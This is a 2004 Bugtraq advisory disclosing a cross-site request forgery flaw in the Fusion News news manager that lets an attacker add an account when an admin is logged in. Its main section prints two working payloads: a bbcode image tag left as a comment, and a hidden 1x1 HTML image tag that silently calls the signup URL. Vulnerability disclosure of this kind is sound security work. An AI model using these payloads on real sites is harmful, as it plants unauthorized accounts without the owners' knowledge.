[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Fusion News Yet Another Unauthorized Account Addition Vulnerability
From: Joseph Moniz <r3d_5pik3 () yahoo ! com>
Date: 2004-07-29 22:52:24
Message-ID: 20040729225224.24449.qmail () www ! securityfocus ! com
[Download RAW message or body]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product: Fusion News
vendor: FusionPHP (fusionphp.net)
Affected Versions: 3.6.1 and lower
Description: A widely used news management system
Vulnerabilities: Unauthorized Account Addition Vulnerability
Date: July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Unauthorized Account Addition
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)
Ok this is basicly all due to the vendor being really lazy and not SUFFEICENTLY \
patching the previous similar exploit. Basicly all the vendor did to stop the last \
vulnrability was make it so you had to be signd on as an admin to creat an account, \
and that is simply just not enough.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o)
Unlike the previous related vulnrability this one you cant simply type something into \
the url bar and press enter. All you have to do is make sure the admin is logged on \
then do one of the following. (the first is probably the most reliable for an \
attacker) 1.)Leave them a comment with an [img] bbcode set like this
[img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1[/img]
2.)As long as the admin has RECENTLY logged on you could exploit it remotely. By \
convincing him to go to a site that has a malicious <img> tag such as the following
<img src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&usern \
ame=teh-r3d-1&email=r3d_5pik3@yahoo.com&password=password&icon=&le=3&timeoffset=1" \
size="1" width="1">
That would make a 1x1 pixel image meaning the admin wouldnt even know what happend.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)
Give me 5 seconds to press the send button to the vendor ;)
-r3d5pik3
(o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic